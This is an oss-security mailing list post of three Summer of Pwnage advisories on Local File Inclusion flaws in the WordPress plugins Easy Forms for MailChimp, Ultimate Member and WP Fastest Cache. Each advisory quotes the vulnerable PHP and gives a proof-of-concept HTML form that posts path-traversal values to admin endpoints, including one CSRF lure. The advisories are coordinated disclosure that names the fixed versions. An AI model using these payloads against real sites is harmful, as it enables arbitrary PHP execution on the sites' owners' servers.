Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 17 Jul 2016 10:03:11 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Local File Inclusion vulnerabilities affecting three
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.




------------------------------------------------------------------------
Easy Forms for MailChimp Local File Inclusion vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Easy Forms for MailChimp WordPress plugin is
vulnerable to Local File Inclusion. This issue can potentially be
exploited to run arbitrary PHP code. In order to do so, the attacker
must be able to place an arbitrary PHP file on the target system. The
malicious file must have the .php extension.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0023

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Easy Forms for MailChimp [2]
WordPress Plugin version 6.0.5.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Easy Forms for MailChimp 6.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Easy Forms for MailChimp [2] WordPress Plugin allows adding
unlimited MailChimp sign up forms to a WordPress site. It is possible to
add forms to posts, pages, sidebars and other widgetized areas. A Local
File Inclusion vulnerability exists in the Easy Forms for MailChimp
WordPress plugin. This issue can potentially be exploited to run
arbitrary PHP code. In order to do so, the attacker must be able to
place an arbitrary PHP file on the target system. The malicious file
must have the .php extension.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file /admin/partials/menu/options.php and is
caused by the lack of input validation on the section request parameter.
The vulnerable code is listed below.

<?php if( !isset( $_REQUEST['section'] ) || $_REQUEST['section'] == '' )
{ 
		include YIKES_MC_PATH .
'admin/partials/menu/options-sections/general-settings.php';				
	} else {
	if( isset( $_REQUEST['addon'] ) && $_REQUEST['addon'] == 'true' ) {
		include apply_filters(
'yikes-mailchimp-'.$_REQUEST['section'].'-options-path' , '' );	
	} else {
		include YIKES_MC_PATH . 'admin/partials/menu/options-sections/' .
$_REQUEST['section'] . '.php';	
	}
}
?>

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=yikes-inc-easy-mailchimp-settings"
method="POST">
			<input type="hidden" name="section" value="../../edit-form" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/easy_forms_for_mailchimp_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[3]
https://downloads.wordpress.org/plugin/yikes-inc-easy-mailchimp-extender.6.1.zip
------------------------------------------------------------------------
Ultimate Member Local File Inclusion vulnerability
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that Ultimate Member [2] is vulnerable to PHP File
Inclusion [3]. In order to exploit this issue an attacker must be able
to place an arbitrary PHP file on the target system. Afterwards the
attacker needs to lure an authenticated admin to visit a malicious page.
Through CSRF the attacker could compromise WordPress, by executing the
malicious PHP file.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0011

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Ultimate Member [2] WordPress
plugin version 1.3.64.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is a fix available in Pre-released version: pre-v1.3.65.10 [4].
After the fix is applied user input is no more used when including local
files in WordPress.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The File Inclusion vulnerability allows an attacker to include a file, 
exploiting a "dynamic file inclusion" mechanisms implemented in the
Ultimate Member plugin of WordPress. 

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability occurs due to the use of user-supplied input in the
'page' parameter without proper validation.  
The code first checks if 'ultimatemember-' exists in page parameter
supplied by user. If it exists it deletes 'ultimatemember-' and assigns
user input to the template parameter. Lastly it inserts user input in
the PHP function include_once [5].

ultimate-member/admin/core/um-admin-dashboard.php:

$page = $_REQUEST['page'];
[..]
		else if ( strstr( $page, 'ultimatemember-' ) ) {
	
			$template = str_replace('ultimatemember-','',$page);
			$file = um_path . 'admin/templates/welcome/'. $template . '.php';
	
			if ( file_exists( $file ) ){
				include_once um_path . 'admin/templates/welcome/'. $template .
'.php';
			}
	
		}	
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Proof of Concept below simply opens a file in the temp folder of
WordPress.

<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=ultimatemember"
method="POST">
			<input type="hidden" name="page"
value="ultimatemember-../../../../../uploads/ultimatemember/temp/dZm2Sr1IbnIy4Ikn3FbWdMlOh2wCzDu3KunD4tIk/stream_photo_697d3db4eba7e7254670210e3c095022_5779a47985512"
/>
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/ultimate_member_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/ultimate-member/
[3] https://www.owasp.org/index.php/PHP_File_Inclusion
[4]
https://github.com/ultimatemember/ultimatemember/commit/50f5828ac7fa08a1afa0a52b456a1db49071c804
[5] http://php.net/manual/en/function.include-once.php
------------------------------------------------------------------------
WP Fastest Cache Member Local File Inclusion vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the WP Fastest Cache WordPress plugin is
vulnerable to Local File Inclusion. This issue can potentially be
exploited to run arbitrary PHP code. In order to do so, the attacker
must be able to place an arbitrary PHP file on the target system. The
malicious file must have the .php extension.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0022

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Fastest Cache [2] WordPress
Plugin version 0.8.5.9.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP Fastest Cache version 0.8.6.0 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP Fastest Cache [2] WordPress Plugin creates static html files from
a dynamic WordPress blog. When a page is rendered, PHP and MySQL are
used. Therefore, system needs RAM and CPU. If many visitors come to a
site, system uses lots of RAM and CPU so page is rendered so slowly. In
this case, you need a cache system not to render page again and again.
Cache system generates a static html file and saves. Other users reach
to static html page. A Local File Inclusion vulnerability exists in the
WP Fastest Cache WordPress plugin. This issue can potentially be
exploited to run arbitrary PHP code. In order to do so, the attacker
must be able to place an arbitrary PHP file on the target system. The
malicious file must have the .php extension.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wpFastestCache.php and is caused by the
lack of input validation on the id POST parameter. The vulnerable code
is listed below.

public function wpfc_cdn_template_ajax_request_callback(){
	if(current_user_can('manage_options')){
		ob_start();
		include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
		$content = ob_get_contents();
		ob_end_clean();
	
[...]

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action"
value="wpfc_cdn_template_ajax_request" />
			<input type="hidden" name="id" value="../exclude" />
			<input type="submit" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/wp_fastest_cache_member_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/wp-fastest-cache/
[3] https://downloads.wordpress.org/plugin/wp-fastest-cache.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ